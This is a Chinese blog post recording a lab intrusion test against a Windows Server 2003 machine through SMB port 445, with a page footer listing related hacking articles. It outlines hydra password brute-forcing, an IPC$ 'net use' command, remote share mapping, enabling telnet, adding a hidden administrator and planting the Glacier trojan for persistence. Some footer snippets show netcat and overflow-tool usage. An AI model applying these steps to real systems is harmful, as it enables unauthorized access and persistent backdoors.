基于445端口漏洞的入侵测试

最新推荐文章于 2024-06-06 17:45:00 发布
最新推荐文章于 2024-06-06 17:45:00 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: windows 漏洞 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44769042/article/details/119220125
版权

记一次实验

  • 实验环境

靶机:一台Windows server 2003(IP:192.168.129.10)服务器

攻击者:一台Windows xp主机(IP:192.168.129.20)和一台kali主机(IP:192.168.129.30)

  • 实验原理

(1)445端口的smb服务提供了主机远程访问的服务器的潜在威胁

(2)Windows下共享文件服务开启时,存在隐藏共享文件

(3)Windows server 2003自带telnet功能,存在安全隐患

  • 实验步骤

在Windows xp上运行端口扫描软件scan port,对服务器进行扫描,可以发现服务器开放445端口

在kali上运行hydra工具,使用准备好的用户名和密码字典对服务器smb服务进行暴力破解

先建一个用户名&密码字典

使用九头蛇工具去暴力破解

      

建立连接

利用服务器445端口漏洞,在Windows xp上与靶机服务器建立空连接

net use \\192.168.129.10\ipc$ /user:administrator 123.com

实现远程访问服务器文件

借助Windows的隐藏共享文件漏洞,在Windows xp主机端实现对服务器文件的远程访问,并将服务器c盘文件映射到主机z盘

远程开启服务器telnet务并连接

此时可以直接远程登陆

留下后门

创建新用户并添加到管理员组

给服务器端植入冰河木马服务器端

直接将冰河木马的服务端放在03的根目录

设置一个时间,让03启动冰河木马服务端

时间到后,在xp telnat查看03端口,7626已经打开

此时在xp上用客户端去连接

可以执行一系列操作

木剑温小二丶
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
nmap扫描445端口_Trigmap:一款专用于渗透测试的Nmap封装工具
weixin_39984105的博客
11-30 1002
工具介绍Trigmap是一款针对Nmap的封装工具,它可以帮助研究人员简化Nmap扫描操作,并通过将扫描到的数据有组织地存储到目录结构中来帮助研究人员对数据进行归类和分析。除此之外,该工具还使用了优化的Nmap算法,并且可扩展性和跨平台性都非常好。功能介绍Trigmap可以使用Nmap脚本引擎来完成下列任务:1、 端口扫描2、 服务和版本检测3、 Web资源枚举4、 漏洞审计/评估5、 ...
方程式445漏洞检测
11-12
方程式445批量检测工具(MS17-010) 全自动极速版。仅限于检测,请勿非法使用。
各种端口的入侵方法
yangshen998
02-18 2267
1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破(字典是关键) 最后 SQLTool*.**e入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) s...
渗透测试之内网渗透学习
最新发布
qingkahui24689的博客
06-06 543
以上便是我学习的简单地从外网获取shell,经过提权或不提权直接进行内网渗透的一个简单过程,其中涉及一些概念问题没有说的很明白,希望表哥们提点提点。以上仅为个人学习过程,可能知识点过于简单,望理解。为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包。😝有需要的小伙伴,可以点击下方链接免费领取【一一帮助安全学习,所有资源获取处一一】
445端口攻击
m0_61948493的博客
11-23 1万+
一、简单的渗透攻击 1、端口 首先要先了解了解一下一些基本的端口所对应的服务: 1)FTP:文件共享服务 2)SSH:专为远程登陆会话和其他网络服务提供安全性的协议,有效防止远程管理过程中的信息泄露问题(比telnet安全) 3)telnet: Internet远程登录服务的标准协议和主要方式 4)SMTP: 建立在FTP文件传输服务上的一种邮件服务 5)DNS : 域名解析服务 6)HTTP 、HTTPS:超文本传输协议(建立在TCP,HTTPS比HTTP更安全) 7)共享...
基于机器学习的端口扫描入侵检测.pdf
04-12
【基于机器学习的端口扫描入侵检测】 在信息化飞速发展的时代,互联网成为了第三次和第四次工业革命的重要支撑。然而,随着技术的进步,网络安全问题也日益凸显。端口扫描是黑客常用的攻击手段之一,用于发现目标...
基于metasploit框架的渗透测试方法研究
12-15
渗透测试,又称为入侵测试或白帽黑客攻击,是一种安全评估方法,目的是在获得授权的情况下,模拟黑客行为来检测网络和系统的弱点。这种测试有助于识别潜在的安全漏洞,以便及时修复,增强整体安全性。渗透测试的执行...
基于Python的漏洞扫描系统(django).zip
07-06
基于Python的漏洞扫描系统(django) web端口测试;渗透测试;python;django;mysql; 本次的系统开发是通过利用了Python技术,结合数据爬虫的功能来进行一款自动化的渗透测试的工具开发,一次来实现对网站的漏洞的...
基于Python socket的端口扫描程序实例代码
09-20
Python socket库是Python标准库的一部分,它提供了网络通信的基本功能,包括创建套接字、连接到远程主机、发送和接收...通过理解这些基础知识,开发者可以构建更复杂的安全工具,如网络监控、漏洞检测和入侵检测系统。
御剑高速tcp端口扫描工具
01-05
【御剑高速TCP端口扫描工具】是一款专为网络安全专业人士设计的高效端口扫描软件,其主要功能是快速检测目标网络或单个主机上的开放TCP端口,从而帮助用户了解网络的安全状况,发现潜在的漏洞入侵风险。...
445端口漏洞溢出工具
08-04
445端口漏洞溢出工具来自于互联网,使用时请自行检测,杀毒!
利用MS08067漏洞扫描445断口主机入侵(工具)
05-17
利用MS08067漏洞扫描445断口主机入侵(工具)
445端口攻击详解/教学
03-22
445端口攻击 详解/教学 仅供教学。 后果自承,私人收藏
Windows7 445端口漏洞
qq_56889067的博客
11-17 1965
使用nmap扫描靶机,可获得信息 这是一个win7操作系统,以及他开启了445端口。 我们这里打开msf调用17_010模块进行渗透测试。 然后设置目标靶机直接exploit 。 回显下面端口我们就可以进行很多操作 如在run vnc 可以监听靶机此刻在干什么。如果靶机未进入用户则不会监听。当然监听不能进行操作。 还可以开启靶机的远程桌面服务端口 ,使用命令前我们关闭靶机远程桌面。 使用命令 run getgui -e,然后使用kali渗透机远程桌面进行测试 使用rdesk...
445端口入侵详解
热门推荐
无界编程
03-23 7万+
445端口入侵详解   关于“445端口入侵”的内容445端口入侵详解本站搜索更多关于“445端口入侵”的内容 445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?445端口就是IPC 服务的默认端口                                                            ipc$一 摘要 二 什么是 ipc$ 三 什么是空会
【内网安全】445端口入侵扫描
不忘初心,护天下安全!
02-12 8386
一、445端口 445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉!2017年10月,由于病毒“坏兔子”来袭,国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445和139端口 。 445端口是IPC 服务的默认端口,正是...
漏洞利用三:445端口漏洞利用
ZY95001的博客
09-04 1万+
445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。 靶机:win7系统 IP:10.0.0.199 提前关闭靶机防火墙 一、MS17-010 永恒之蓝 MS微软,17年,10号漏洞。即新闻上报道的比特币勒索病毒。 1.进入MSF控制台:msfconsole 2.找到要利用的漏洞输入编号(search命令):search ms17-010 3.查看组件列表,选择要利用的攻击项(use命令):use 0 4.以为此处提示需...
《渗透测试实战》第三版中文PDF,红队视角解析
1. **前期侦查**:涵盖信息收集、网络扫描、DNS查询、开放端口分析等,这些是渗透测试的初始步骤,为后续的攻击奠定基础。 2. **漏洞利用**:讲解各种类型的安全漏洞,如缓冲区溢出、SQL注入、XSS攻击等,以及如何...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值